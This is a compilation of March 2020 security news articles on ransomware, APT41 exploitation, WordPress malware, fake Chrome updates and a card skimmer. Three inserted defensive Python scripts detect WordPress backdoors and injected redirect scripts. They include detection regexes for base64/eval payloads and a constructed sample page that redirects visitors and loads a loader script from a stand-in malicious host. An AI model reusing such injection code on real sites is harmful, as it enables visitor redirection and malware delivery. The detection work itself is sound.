Last year, we discovered a vulnerability in iOS that causes connections to bypass VPN encryption. This is a bug in iOS that impacts all VPNs. We have informed Apple, and we are now sharing details so you can stay safe. https://protonvpn.com/blog/apple-ios-vulnerability-disclosure/ …

10:08 PM - Mar 25, 2020
Temporary workarounds
Apple acknowledged the VPN bypass vulnerability after ProtonVPN's report and is currently looking into options on how to fully mitigate it.

Until a fix is provided, Apple recommends using Always-on VPN to mitigate this problem. However, since this workaround relies on device management, it cannot be used to mitigate the vulnerability for third-party VPN apps such as ProtonVPN.

ProtonVPN recommends the following procedure if you are using a third-party VPN:

1. Connect to a VPN server.

2. Turn on airplane mode. This will kill all Internet connections and temporarily disconnect the VPN.

3. Turn off airplane mode. The VPN will reconnect, and your other connections should also reconnect inside the VPN tunnel (not 100% reliable).


Chubb Cyber Insurer Allegedly Hit By Maze Ransomware Attack
29.3.2020  Bleepingcomputer  Ransomware

Cyber insurer giant Chubb is allegedly the latest ransomware victim according to the operators of the Maze Ransomware who claim to have encrypted the company in March 2020.

Chubb is one of the leading insurance carriers in the world with an extensive line of cyber insurance products that include incident response, forensics, legal teams, and even public relations.

Ransomware is not unknown to Chubb: in its 2019 Cyber InFocus Report, Chubb explains that malware-related claims rose by 18% in 2019, with ransomware responsible for 40% of manufacturers' cyber claims and 23% of cyber claims for smaller businesses.

Ransomware targets per industry (Source: Chubb Cyber InFocus Report)
Maze claims they encrypted Chubb's network
In a new entry on their Maze 'News' site, the ransomware operators claim to have encrypted devices on Chubb's network in March 2020.


As part of these attacks, the Maze operators steal a company's files before encrypting its network. The stolen files are then used as leverage, with the operators threatening to publicly release them if a ransom is not paid.

Since then, other ransomware operators such as REvil, DoppelPaymer, and CLOP have also begun to adopt this extortion tactic.

After encrypting victims, Maze will create an entry on their news site as a warning to the victim that if they do not pay, their data will be published. If a victim does not pay, the operators publish an increasingly larger amount of stolen data until it is all released.

Maze has not published any of the allegedly stolen data, but has included the email addresses of executives such as CEO Evan Greenberg, COO John Keogh, and Vice Chairman John Lupica. This information, though, should not be considered proof of encryption, as the emails are readily available on public websites.

Furthermore, as published stolen data usually contains the personal information of employees and sensitive client information, it causes ransomware attacks to become a data breach. This brings along all of the legal and notification requirements, PR nightmares, and the potential of lawsuits.

In a statement to BleepingComputer, Chubb stated that they are investigating whether this is unauthorized access to their data held at a third-party service provider as there is no evidence that their network was breached.

"We are currently investigating a computer security incident that may involve unauthorized access to data held by a third-party service provider. We are working with law enforcement and a leading cybersecurity firm as part of our investigation. We have no evidence that the incident affected Chubb’s network. Our network remains fully operational and we continue to service all policyholder needs, including claims. Securing the data entrusted to Chubb is a top priority for us. We will provide further information as appropriate", Chubb told BleepingComputer.

The Maze operators have told BleepingComputer that they are not providing any further details of the attack at this time.

Vulnerable Citrix gateways on Chubb network
While Chubb states that their network has not been compromised, cybersecurity intelligence firm Bad Packets has stated that the company has numerous Citrix ADC (Netscaler) servers that are vulnerable to the CVE-2019-19871 vulnerability.


This vulnerability has been exploited in the past to hack into networks and install ransomware.

Phobos Group's Dan Tentler also tweeted that Chubb has a Remote Desktop server publicly accessible from the Internet, which is a huge security risk.

Dan Tentler tweet

According to the FBI, "RDP is still 70-80% of the initial foothold that ransomware actors use."

It is not known if any of these devices were used as part of the attack, but they should be secured to enhance perimeter security.

Update 3/26/20: Added information about vulnerable Citrix gateways, RDP servers, and Chubb's statement.


Google Resumes Chrome Releases on an Adjusted Schedule
29.3.2020  Bleepingcomputer  IT

Google today announced that Chrome and Chrome OS releases will be resumed on an adjusted schedule after previously pausing them due to employees having to work from home during the novel coronavirus pandemic.

The Google Chrome development team is currently working remotely throughout the novel coronavirus outbreak with development efforts being focused on releasing Chrome v81, the next stable release, on April 7.

This schedule page can be checked for accurate release dates for future Google Chrome milestones — dates for M84 and beyond can still be changed at any given time.

The new release schedule is as follows:

M83 will be released three weeks earlier than previously planned and will include all M82 work as we canceled the M82 release (all channels).
Our Canary, Dev and Beta channels have or will resume this week, with M83 moving to Dev, and M81 continuing in Beta.
Our Stable channel will resume release next week with security and critical fixes in M80, followed by the release of M81 the week of April 7, and M83 ~mid-May.
We will share a future update on the timing of the M84 branch and releases.
"We continue to closely monitor that Chrome and Chrome OS are stable, secure, and work reliably," Google's blog post reads.

"We’ll keep everyone informed of any changes on our schedule on this blog and will share additional details on the schedule in the Chromium Developers group, as needed."

Chrome v82 is off the table
Google announced a week ago that they will no longer work on Chrome 82 development because of the new release schedule and will skip to Chrome 83 instead.

This is now confirmed by the Chrome milestones schedule page that only lists the 81, 83, and 84 builds, with build 82 being jumped because of COVID-19 adjustments.

After Chrome releases were paused, Google said that they will prioritize security updates that will be released as Chrome v80 updates.

"We’ll continue to prioritize any updates related to security, which will be included in Chrome 80," Google said.

Google Chrome 80.0.3987.149 was released right after the company announced the Chrome v81 delay, with security fixes for 13 high severity vulnerabilities.


Chinese Hackers Use Cisco, Citrix, Zoho Exploits In Targeted Attacks
29.3.2020  Bleepingcomputer  BigBrothers

The Chinese state-sponsored group APT41 has been at the helm of a range of attacks that used recent exploits to target security flaws in Citrix, Cisco, and Zoho appliances and devices of entities from a multitude of industry sectors spanning the globe.

It is not known if the campaign that started in January 2020 was designed to take advantage of companies having to focus on setting up everything needed by their remote workers while in COVID-19 lockdown or quarantine but, as FireEye researchers found, the attacks are definitely of a targeted nature.

Broadest Chinese APT campaign in years
As FireEye notes, APT41's recent campaign is one of the most extensive ones Chinese cyber-espionage actors ran in recent years.

"Between January 20 and March 11, FireEye observed APT41 attempt to exploit vulnerabilities in Citrix NetScaler/ADC, Cisco routers, and Zoho ManageEngine Desktop Central at over 75 FireEye customers." the report says.

APT41 is a highly prolific Chinese-backed hacking group, active since at least 2012, known for espionage, cybercrime, and surveillance operations against a large array of industries as well as individuals.

This group will usually rely on spear-phishing emails to infiltrate a target's network and then use second-stage malware payloads to compromise the entire environment with the help of dozens of malicious tools while maintaining persistence.

Citrix devices under attack
In their latest campaign, the APT41 hackers were observed while attacking targets from banking and finance, government, high tech, oil & gas to telecom, healthcare, media, and manufacturing.

During this series of seemingly targeted attacks, they focused their attention on entities from a multitude of countries including but not limited to the US, the UK, France, Italy, Japan, Saudi Arabia, and Switzerland.

"It’s unclear if APT41 scanned the Internet and attempted exploitation en masse or selected a subset of specific organizations to target, but the victims appear to be more targeted in nature," FireEye's researchers added.

Timeline of APT41 attacks
Timeline of APT41 attacks (FireEye)
While exploiting the CVE-2019-19781 vulnerability impacting Citrix Application Delivery Controller (NetScaler ADC) and Citrix Gateway (NetScaler Gateway) servers, APT41 only tried to exploit Citrix devices which hints that the group was using a list of previously identified servers collected during past Internet scans.

During this series of attacks, the APT41 actors were seen fluctuating between periods of high exploitation activity and intermissions.

As FireEye discovered, the hiatus intervals coincide either with Chinese holidays or with quarantine measures taken by the Chinese government in response to the COVID-19 pandemic.

"While it is possible that this reduction in activity might be related to the COVID-19 quarantine measures in China, APT41 may have remained active in other ways, which we were unable to observe with FireEye telemetry," the researchers said.

Zoho and Cisco exploitation
On February 21, APT41 compromised a telecommunications organization's Cisco RV320 router but FireEye researchers were unable to determine what exploit was used during this attack after analyzing the incident.

"It is unknown what specific exploit was used, but there is a Metasploit module that combines two CVE’s (CVE-2019-1653 and CVE-2019-1652) to enable remote code execution on Cisco RV320 and RV325 small business routers and uses wget to download the specified payload," FireEye said.

APT41 then moved on to exploiting the CVE-2020-10189 Zoho ManageEngine zero-day no-auth remote code execution vulnerability that allows threat actors to execute arbitrary code as SYSTEM/root on unpatched systems.

Starting on March 8, one day after Zoho permanently fixed CVE-2020-10189, the Chinese group attacked over a dozen FireEye customers and managed to compromise the systems of at least five of them.

Christopher Glyer
@cglyer
Replying to @cglyer
The CVE-2020-10189 exploitation activity is convoluted enough that you should probably just read the blog...but the TLDR is: exploit --> some combo of bitsadmin, powershell, Cobalt Strike backdoor, CertUtil, VMProtected Meterpreter downloader, BEACON shellcode pic.twitter.com/3FRTzre53H

2:52 PM - Mar 25, 2020
The hackers then deployed a trial-version of the Cobalt Strike BEACON loader and dropped another backdoor used for downloading a VMProtected Meterpreter downloader.

This isn't the first time APT41 has used publicly available exploits to target internet-facing systems: FireEye had previously observed the group abusing both CVE-2019-11510 in Pulse Secure VPN and CVE-2019-3396 in Atlassian Confluence as recently as October 2019.

"It is notable that we have only seen these exploitation attempts to leverage publicly available malware such as Cobalt Strike and Meterpreter," the report concludes.

"While these backdoors are full-featured, in previous incidents APT41 has waited to deploy more advanced malware until they have fully understood where they were and carried out some initial reconnaissance.

"This new activity from this group shows how resourceful and how quickly they can leverage newly disclosed vulnerabilities to their advantage."

More details on APT41's activities since the start of 2020 including indicators of compromise (IOCs) and a MITRE ATT&CK technique mapping are available at the end of FireEye's report.


WordPress Malware Distributed via Pirated Coronavirus Plugins
29.3.2020  Bleepingcomputer  Virus

The threat actors behind the WordPress WP-VCD malware have started to distribute modified versions of Coronavirus plugins that inject a backdoor into a web site.

The WP-VCD family of WordPress infections is distributed as nulled, or pirated, WordPress plugins containing modified code that injects a backdoor into any themes installed on the blog as well as into various PHP files.

Once a WordPress site is compromised by WP-VCD, the malware will attempt to compromise other sites on the same shared host and will routinely connect back to its command & control server to receive new instructions to execute.

The ultimate goal of these malicious plugins is to use the compromised WordPress site to display popups or perform redirects that generate revenue for the threat actors.

Example advertisement shown by WP-VCD (Source: WordFence)
Pirated Coronavirus plugins spread WP-VCD
Recently MalwareHunterTeam shared some samples of WordPress plugins with BleepingComputer that were being flagged on VirusTotal as 'Trojan.WordPress.Backdoor.A'.

These WordPress plugins and another one we found were zip files containing what appeared to be legitimate commercial plugins named "COVID-19 Coronavirus - Live Map WordPress Plugin", "Coronavirus Spread Prediction Graphs", and "Covid-19".

Readme.txt file for a pirated plugin
After BleepingComputer analyzed them, we found that all of these plugins contained a 'class.plugin-modules.php' file that contained malicious code and various base64 encoded strings that are commonly associated with WP-VCD plugins.

class.plugin-modules.php file
After the plugin is installed, it will take the base64 encoded PHP code in the WP_CD_CODE variable shown above and save it to the /wp-includes/wp-vcd.php file.

It then prepends code to the /wp-includes/post.php file so that it automatically loads wp-vcd.php every time a page is loaded on the site.

Code to create wp-vcd.php file
The plugin will also search for all of the installed themes and add another base64-encoded PHP payload to each theme's functions.php file.

Infecting theme's functions.php file
With these file modifications, the WP-VCD code will now connect back to its C2 server to receive commands to execute on the WordPress host.

These commands will commonly be used to inject code that displays malicious advertisements on the site or perform redirects to other sites.
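The three file modifications just described (the dropped wp-includes/wp-vcd.php, the include prepended to wp-includes/post.php, and the base64 payload added to each theme's functions.php) can be checked for with a small integrity scan. The Python script below is an added example, not BleepingComputer's or WordFence's code; it builds a constructed, minimal WordPress layout in a temporary directory and runs the checks against it. The injection regexes are an assumption about what a generic base64/eval injection looks like and will not match every real sample, so treat hits as items to review rather than as confirmation.

```python
import os
import re
import tempfile

# Indicators for the three infection steps described in the article. The
# regexes are an assumption about generic base64/eval injections; real WP-VCD
# samples vary, so a hit means "review this file", not proof of compromise.
INJECTION_PATTERNS = [
    re.compile(r"eval\s*\(\s*base64_decode\s*\(", re.I),
    re.compile(r"""base64_decode\s*\(\s*['"][A-Za-z0-9+/=]{40,}['"]\s*\)""", re.I),
    re.compile(r"wp-vcd\.php"),
]


def has_injection(php_source):
    """True if the PHP source matches any of the injection patterns."""
    return any(p.search(php_source) for p in INJECTION_PATTERNS)


def scan_wordpress(root):
    """Scan a WordPress install at `root` for the three WP-VCD artefacts.

    Returns a sorted list of (indicator, path-relative-to-root) tuples.
    """
    findings = []
    wp_includes = os.path.join(root, "wp-includes")

    # 1. The dropped payload file itself.
    if os.path.isfile(os.path.join(wp_includes, "wp-vcd.php")):
        findings.append(("dropper-file", "wp-includes/wp-vcd.php"))

    # 2. Code prepended to post.php so the dropper loads on every page view.
    #    Only the first 4 KB is inspected: a clean post.php opens with the
    #    WordPress file header, so any reference to wp-vcd.php there is abnormal.
    post_php = os.path.join(wp_includes, "post.php")
    if os.path.isfile(post_php):
        with open(post_php, "r", encoding="utf-8", errors="replace") as fh:
            if "wp-vcd.php" in fh.read(4096):
                findings.append(("prepended-include", "wp-includes/post.php"))

    # 3. Base64/eval payload added to every installed theme's functions.php.
    themes_dir = os.path.join(root, "wp-content", "themes")
    if os.path.isdir(themes_dir):
        for theme in sorted(os.listdir(themes_dir)):
            functions_php = os.path.join(themes_dir, theme, "functions.php")
            if not os.path.isfile(functions_php):
                continue
            with open(functions_php, "r", encoding="utf-8", errors="replace") as fh:
                if has_injection(fh.read()):
                    findings.append(("theme-injection",
                                     f"wp-content/themes/{theme}/functions.php"))
    return sorted(findings)


def build_sample_site(root, infected):
    """Write a constructed, minimal WordPress layout under root (demo only)."""
    themes = ("twentytwenty", "custom-theme")
    os.makedirs(os.path.join(root, "wp-includes"), exist_ok=True)
    for theme in themes:
        os.makedirs(os.path.join(root, "wp-content", "themes", theme), exist_ok=True)

    post_php = "<?php\n/**\n * Core Post API\n */\nfunction get_post() {}\n"
    functions_php = "<?php\nadd_action('init', 'theme_setup');\n"
    if infected:
        # Constructed stand-ins for the injected code; the base64 blob is junk.
        post_php = ("<?php if (file_exists(dirname(__FILE__) . '/wp-vcd.php')) "
                    "include_once('wp-vcd.php'); ?>\n") + post_php
        functions_php += "<?php eval(base64_decode('" + "QUFB" * 20 + "')); ?>\n"
        with open(os.path.join(root, "wp-includes", "wp-vcd.php"), "w") as fh:
            fh.write("<?php /* constructed placeholder for the dropped payload */ ?>\n")
    with open(os.path.join(root, "wp-includes", "post.php"), "w") as fh:
        fh.write(post_php)
    for theme in themes:
        with open(os.path.join(root, "wp-content", "themes", theme, "functions.php"), "w") as fh:
            fh.write(functions_php)


def demo(infected=True):
    """Build a sample site in a temp dir and return the scanner's findings."""
    with tempfile.TemporaryDirectory(prefix="wp-scan-") as root:
        build_sample_site(root, infected)
        return scan_wordpress(root)


if __name__ == "__main__":
    for indicator, path in demo():
        print(f"{indicator:20s} {path}")
```

Pointed at a real install (scan_wordpress("/var/www/html")), the scanner only reads files. Comparing wp-includes against a pristine copy of the same WordPress version remains the more reliable check for modified core files, since a cleaned-up injection will not necessarily match the patterns above.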

Protecting your WordPress sites from WP-VCD
As the WP-VCD malware is spread through pirated WordPress plugins, the best way to avoid having your site infected is to not download any plugins from unauthorized sites.

As plugins are easily modified by anyone with a modicum of PHP knowledge, downloading and installing pirated plugins is always a risky venture.

In this environment, we are seeing an even greater uptick in malicious campaigns taking advantage of the anxiety and concerns of the Coronavirus pandemic to distribute malware and phishing attacks.

It is strongly advised that you only install WordPress plugins from authorized sites and do not install any pirated plugins as there is a good chance your site will become compromised.


Google Chrome Adding Option to Always Show Full URLs
29.3.2020  Bleepingcomputer  IT

Google is working on providing Chrome users with an option to set the browser to always show full URLs for all websites they visit.

At the moment, the option to always show full URLs can only be enabled using an experimental flag on Google Chrome Canary version 83 and it can be accessed via the Omnibox context menu by Mac, Windows, Linux, and Chrome OS users.

As we'll also show below, Google has a long history of working towards hiding the protocol, and what it calls trivial or special-case subdomains, from the URLs displayed in Chrome's address bar.

How to reenable full URLs in Chrome Canary
Windows, Mac, Linux, and Chrome OS users who utilize Google's Chrome Canary can configure their browsers to show the full URLs for all websites using the omnibox-context-menu-show-full-urls experimental flag.

The newly added flag is designed to provide Chrome Canary users with an omnibox context menu option that will prevent URL elisions aka the removal of some URL elements Google considers not important.

To do this, you have to go through the following steps:

1. Go to chrome://flags/#omnibox-context-menu-show-full-urls.

2. Click the drop-down menu on the right side of the flag to select 'Enabled'

3. Restart the web browser.

Enabling the Chrome 'show full URLs' option
Afterward, you will be able to find an 'Always show full URLs' Omnibox context menu option that will tell Chrome to display the entire URL, without eliding any components.

A slimmed-down or early version of this option has already been rolled out to some users of Google Chrome version 80, as BleepingComputer was also able to confirm.

The 'Show URL' option allows them to enable full URLs on a per-page basis — the setting doesn't stick though as it will be forgotten after refreshing the page.

As it is currently being tested in Google Chrome Canary version 83.0, the 'Always show full URLs' Omnibox context menu option will most likely roll out once that version of Google Chrome reaches the stable channel.

Full URL in the address bar
Out of sight, out of mind
The WWW and M subdomains together with the protocol part (e.g., HTTP, HTTPS, or FTP) of the URL were initially stripped from Chrome's address bar with the release of Chrome 69 in September 2018.

Following users' outcry opposing this change, Google reversed the decision but, once again, hid them from URLs shown in the address bar for users of Chrome 76 on desktop and Android devices.

"The Chrome team values the simplicity, usability, and security of UI surfaces," as product manager Emily Schechter said at the time.

"To make URLs easier to read and understand, and to remove distractions from the registrable domain, we will hide URL components that are irrelevant to most Chrome users," she added. "We plan to hide 'https' scheme and special-case subdomain 'www' in Chrome omnibox on desktop and Android in M76."

Google did leave in an option to have it reversed, as users were still able to enable full URLs in the Omnibox by enabling the temporary-unexpire-flags-m76 flag. However, that lasted until Chrome 79 was released as that flag was permanently removed.
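To make concrete what elision hides, here is an added Python model of the Chrome 69 behaviour described above (my simplification, not Chrome's code): it strips the scheme and a leading www. or m. label, then groups distinct origins that end up looking identical in the address bar. The sample URLs are constructed; the point is that http and https, and the www, m and apex hosts (separate DNS names that need not serve the same site), all collapse to one display string.

```python
from urllib.parse import urlsplit

# Simplified model of the Chrome 69 elision described in the article (assumption,
# not Chrome's code): hide the scheme and a leading "www." or "m." label.
TRIVIAL_LABELS = ("www.", "m.")


def elide_url(url):
    """Return the text an eliding address bar would show for this URL."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    # Only strip the label when a registrable domain remains ("www.com" stays whole).
    for label in TRIVIAL_LABELS:
        if host.startswith(label) and host.count(".") >= 2:
            host = host[len(label):]
            break
    port = f":{parts.port}" if parts.port else ""
    path = parts.path or "/"
    query = f"?{parts.query}" if parts.query else ""
    return f"{host}{port}{path}{query}"


def origin(url):
    """scheme://host[:port], the unit browsers actually isolate state by."""
    parts = urlsplit(url)
    return f"{parts.scheme}://{parts.netloc.lower()}"


def display_collisions(urls):
    """Map each elided display string to the distinct origins producing it.

    Only entries with more than one origin are returned: those are the cases
    where the address bar alone cannot tell the user which site they are on.
    """
    by_display = {}
    for url in urls:
        by_display.setdefault(elide_url(url), set()).add(origin(url))
    return {shown: sorted(origins)
            for shown, origins in by_display.items() if len(origins) > 1}


# Constructed sample: four different origins that all render as "example.com/login".
SAMPLE_URLS = [
    "https://www.example.com/login",
    "http://www.example.com/login",   # plaintext, but the scheme is hidden
    "https://example.com/login",      # apex host, a separate DNS name
    "https://m.example.com/login",    # "m." is treated as trivial too
    "https://www.example.org/login",  # a different site, shown differently
]

if __name__ == "__main__":
    for shown, origins in display_collisions(SAMPLE_URLS).items():
        print(shown, "<-", ", ".join(origins))
```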

Eric Lawrence 🎻
@ericlaw
TIL (Thanks Emily!) that if you have the Suspicious Site Reporter browser extension enabled, Chrome 76 doesn't hide the "https://www" at the front of the omnibox.

10:33 PM - Jul 31, 2019
The only way to see the full website address while using Chrome 79 or a newer version is to click twice in the address bar to edit the URL or to install Google's Suspicious Site Reporter Chrome extension.

More recently, Google has also started testing displaying the search query in the Chrome address bar instead of the actual URL of the loaded page when performing searches on Google.

This experimental feature is currently called "Query in Omnibox" and it has been available as a Google Chrome flag since Chrome 71 but it is disabled by default.

"People have a really hard time understanding URLs. They’re hard to read, it’s hard to know which part of them is supposed to be trusted, and in general, I don’t think URLs are working as a good way to convey site identity," Adrienne Porter Felt, Chrome's engineering manager said in a Wired interview,

"So we want to move toward a place where web identity is understandable by everyone—they know who they’re talking to when they’re using a website and they can reason about whether they can trust them."


Windows 10 Insider Build 19592 Brings New 2-in-1 PC Experience
29.3.2020  Bleepingcomputer  OS

Microsoft has released Windows 10 Insider Preview Build 19592 to Insiders in the Fast ring, which brings back the new tablet experience for 2-in-1 convertible PCs.

If you are an Insider on the Fast Ring, you can download the new build now by going into Settings -> Update & Security -> Windows Update and then checking for new updates.

Windows 10 Insider Build 19592

The notable changes in this build are listed below.

To see the full release notes and fixes for this Windows 10 insider build, you can read the blog post.

New tablet experience for 2-in-1 convertible PCs
With this build, Microsoft is rolling out a new 2-in-1 convertible PC tablet experience to Windows Insiders.

This experience was previously rolled out to a limited group of Insiders in 20H1 Build 18970 through Build 19013, and after refinements, is being rolled out again so more Insiders can test the following new features:

This new experience allows users entering tablet posture to stay in the familiar desktop experience without interruption with a few key touch improvements:

Taskbar icons are spaced out
Search box on taskbar is collapsed into icon-only mode
Touch keyboard auto invokes when you tap a text field
File explorer elements will have a little more padding, to make them comfortable to interact with using touch
New 2-in-1 tablet experience
Source: Microsoft
This feature will roll out to a limited number of users at first and expand to more users over time. Microsoft will first roll it out to Insiders who have never detached their keyboard, or who have their tablet mode setting set to "Don’t ask me and don’t switch".

Changes to the Windows Search platform
With this build, Microsoft has updated the logic in the Windows Search file indexer so that it picks better times to index your files and your computer doesn't get bogged down by indexing while you are using it.

Microsoft has also modified the indexing process to limit how often it re-indexes content that has little impact on your searches.


Malware Disguised as Google Updates Pushed via Hacked News Sites
29
.3.2020  Bleepingcomputer  Virus

Hacked corporate sites and news blogs running the WordPress CMS are being used by attackers to deliver backdoor malware that lets them drop several second-stage payloads such as keyloggers, info stealers, and Trojans.

After gaining admin access to the compromised WordPress websites, the hackers inject malicious JavaScript code that will automatically redirect visitors to phishing sites.

These landing pages are designed to look like a legitimate Google Chrome update page and are used by the attackers to instruct potential victims to download an update for their browser.

However, instead of a Chrome update, the targets will download malware installers that will infect their devices and will allow the operators behind this campaign to take control of their computers remotely.

Once executed, the malware installer drops a TeamViewer installation and unarchives two password-protected SFX archives containing the files needed to open the fake update page and to allow remote connections, as well as a script used by the malware to bypass the Windows built-in antivirus.
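The first link in this chain is the JavaScript injected into the compromised pages, so a site owner's quickest check is to triage the served HTML for scripts that should not be there. The script below is an added example, not code from the article, from Doctor Web or from the campaign: it collects external script sources and inline script bodies from a page, flags any external source whose host is not on a per-site allowlist, and flags inline scripts with traits typical of redirect injections (forced navigation, payload decoding, user-agent gating like the campaign's Chrome-only targeting). The two pages and the hostnames in them (example-news.test, fake-update.test) are constructed placeholders, not indicators from the real attack.

```python
"""Triage an HTML page for script injections like the WordPress campaign above.

Added example; it is not code from the article, from Doctor Web, or from the
campaign. The two pages are constructed samples, and the hostnames in them
(example-news.test, fake-update.test) are placeholders, not indicators from
the real attack. The allowlist is something a site owner maintains.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts this site legitimately loads scripts from (assumption for the sample).
ALLOWED_SCRIPT_HOSTS = {"example-news.test", "cdn.example-news.test"}

# Inline-script traits typical of redirect injections: forced navigation,
# decoding of a hidden payload, and browser gating like the campaign's
# Chrome-only targeting.
SUSPICIOUS_INLINE = [
    (r"(window|document|top)\.location(\.href)?\s*=", "forced redirect"),
    (r"\batob\(|\beval\(|\bunescape\(", "payload decoding"),
    (r"navigator\.userAgent", "browser fingerprint gate"),
    (r"(\\x[0-9a-f]{2}){8,}", "hex-escaped string"),
]


class ScriptCollector(HTMLParser):
    """Collects external script URLs and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script, self._buf = True, []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


def triage(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return (severity, reason, evidence) tuples for anything suspicious."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for src in collector.external:
        # Relative URLs have no host and are treated as same-origin.
        host = urlparse(src).hostname if "//" in src else None
        if host and host not in allowed_hosts:
            findings.append(("high", "script from non-allowlisted host", src))
    for body in collector.inline:
        for pattern, reason in SUSPICIOUS_INLINE:
            if re.search(pattern, body, re.IGNORECASE):
                findings.append(("medium", reason, body.strip()[:60]))
    return findings


# Constructed samples: a clean page and the same page with an injected redirect.
CLEAN_PAGE = """<html><head>
<script src="https://cdn.example-news.test/app.js"></script>
<script>window.dataLayer = window.dataLayer || [];</script>
</head><body>news</body></html>"""

INJECTED_PAGE = """<html><head>
<script src="https://cdn.example-news.test/app.js"></script>
<script>
if (navigator.userAgent.indexOf("Chrome") > -1) {
  window.location.href = atob("aHR0cHM6Ly9mYWtlLXVwZGF0ZS50ZXN0Lw==");
}
</script>
<script src="//fake-update.test/loader.js"></script>
</head><body>news</body></html>"""

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)):
        print(name, triage(page) or "no findings")
```

Because the campaign serves the redirect only to Chrome users in selected countries, fetch the page the way a targeted visitor would (a Chrome user agent, from an affected region) before feeding it to the check; a crawler with a generic user agent may never be shown the injected script.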

Fake Chrome update page (Doctor Web)
Hacking group behind several campaigns
The group behind this attack "was previously involved in spreading a fake installer of the popular VSDC video editor through its official website and the CNET software platform," as Doctor Web researchers revealed in their analysis published today.

They are also behind an attack that used a fake NordVPN website to infect targets with the Bolik banking Trojan behind the scenes, while actually installing the NordVPN client to avoid raising any suspicions.

While they previously used the compromised sites to deliver the final payloads directly (a banking Trojan and the KPOT info stealer), this time they switched to a more complex infection chain involving a backdoor that lets them drop other malware.

The attackers use the backdoor to deliver X-Key Keylogger, Predator The Thief stealer, and a Trojan that helps them to control the infected computers over the RDP protocol.

Geolocation used to choose targets
"Target selection is based on geolocation and browser detection. The target audience is users from the USA, Canada, Australia, Great Britain, Israel, and Turkey, using the Google Chrome browser," the researchers explain.

"It is worth noting that the downloaded file has a valid digital signature identical to the signature of the fake NordVPN installer distributed by the same criminal group."

The fake Chrome updates come in the form of two different malicious installers named Critical_Update.exe and Update.exe. The former had been downloaded over 2,290 times since it was added to the Bitbucket repository used for malware delivery, while the latter had already been pushed over 300 times onto unsuspecting targets' machines in the seven hours before the report.

More information on the infection mechanism used in this attack is available in Doctor Web's report, while indicators of compromise (IOCs) can be found on GitHub.

WordPress sites under attack
Since the start of the year, attackers have been actively trying to take control of WordPress websites by exploiting recently patched or zero-day vulnerabilities in plugins, putting hundreds of thousands of sites under siege.

BleepingComputer reported in late February on attempts to take over tens of thousands of WordPress sites by abusing critical bugs, including a zero-day, in multiple plugins that could lead to rogue admin accounts being created and backdoors being planted.

Attackers have also tried to fully compromise or wipe WordPress sites by exploiting unpatched versions of plugins with an estimated 1,250,000 active installations, as well as other WordPress plugin flaws, including the multiple bugs found in the GDPR Cookie Consent plugin used by over 700,000 websites.

Additionally, a high-severity cross-site request forgery (CSRF) bug was discovered in the Code Snippets plugin, which has over 200,000 installs, and two vulnerabilities found in the open-source WP Database Reset plugin, used by over 80,000 sites, could allow site takeovers and database resets.


Microsoft Fixes Windows Defender Scan Bug With New Update
29
.3.2020  Bleepingcomputer  OS

Microsoft has silently fixed the "items skipped during scan" Windows Defender bug that was causing some items to be excluded from scans if they were stored on a network device.

The issue was fixed with the release of the KB4052623 update for the Windows Defender antimalware platform, which raises the platform version to 4.18.2003.8 and stops the "items skipped" notifications from appearing. (The 4.18.x.x number is the antimalware platform version; the scan engine carries a separate 1.1.x.x version.)

KB4052623 applies to devices running Windows 10 (Enterprise, Pro, and Home editions), Windows Server 2019, and Windows Server 2016.

KB4052623

The bug fixed with this update was reported by scores of Windows 10 users starting with the March Patch Tuesday after they started receiving "Items skipped during scan" alerts saying that "The Windows Defender Antivirus scan skipped an item due to an exclusion or network scanning settings."

This happened even when users had no exclusions configured in their systems' Windows Defender preferences, as BleepingComputer was able to confirm.

One day later, BornCity's Günter Born found a simple workaround that silences these notifications by enabling network scanning, although Microsoft's documentation recommends against scanning network files.

The bug was caused by a Windows Defender platform update that disabled network file scanning by default in newer versions; it had been enabled before the updates released on this month's Patch Tuesday.

Windows Defender alert caused by this bug
Microsoft's decision to turn off network scanning in Windows Defender might have been prompted by a high-network-traffic issue mentioned in KB4052623's description, although the issue described there concerns Network Protection, which is a separate feature from scanning files on network shares.

"Enterprises that use Network Protection in either Audit or Block mode may experience greater than expected network traffic departing their networks to Microsoft Defender SmartScreen-associated domains," the knowledgebase article says.

"This affects customers who are running version 4.18.2001.10. We are working on a service update to address this issue. In the interim, you can work around this issue by temporarily disabling Network Protection."

All users should get the KB4052623 update automatically through Windows Update over the next few days, even if they have updates paused.

You can also download and install the update on your own from the Microsoft Update Catalog if you're not keen on waiting for Microsoft to roll it out to your device.


Tupperware Site Hacked With Fake Form to Steal Credit Cards
29
.3.2020  Bleepingcomputer  CyberCrime

Hackers have compromised the website of the world-famous Tupperware brand and are stealing customers' payment card details at checkout. The risk existed for a while, as researchers' attempts to alert the company went unanswered.

Some localized versions of the official Tupperware website were also running malicious code that skims credit card data.

The attack was carefully orchestrated to keep the skimmer active for as long as possible, a clear indication that this is not the work of run-of-the-mill Magecart attackers.

Clever tactic
The hackers used an ingenious method to steal credit card data from Tupperware customers at checkout: they integrated a malicious iframe that displays fake payment form fields to shoppers.

Discovered by researchers at Malwarebytes, the iframe loaded its content from "deskofhelp[.]com," a domain created on March 9 and hosted on a server alongside multiple phishing domains.


Tupperware has since fixed the issue and the payment form now loads from the legitimate domain cybersource.com, owned by Visa. However, some of the attackers' code was still present at the time of writing.

The researchers took a closer look at the domain hosting the malicious content and noticed that it was registered with a Yandex email address, which is downright suspicious for something loading payment forms on a US-branded website.

The fraudsters made an effort to conceal the compromise by loading the iframe dynamically on the checkout page. Thus, looking at the HTML source code shows nothing dubious.

However, checking the iframe source revealed the malicious domain hosting the iframe content.


Multiple localized Tupperware sites were compromised in the same way, and one mistake the attackers made was to use the same payment form on all of them.

As such, the Spanish version of the Tupperware site loaded the attacker’s payment form in English, Jérôme Segura from Malwarebytes writes in a report today, while the legitimate form is localized.

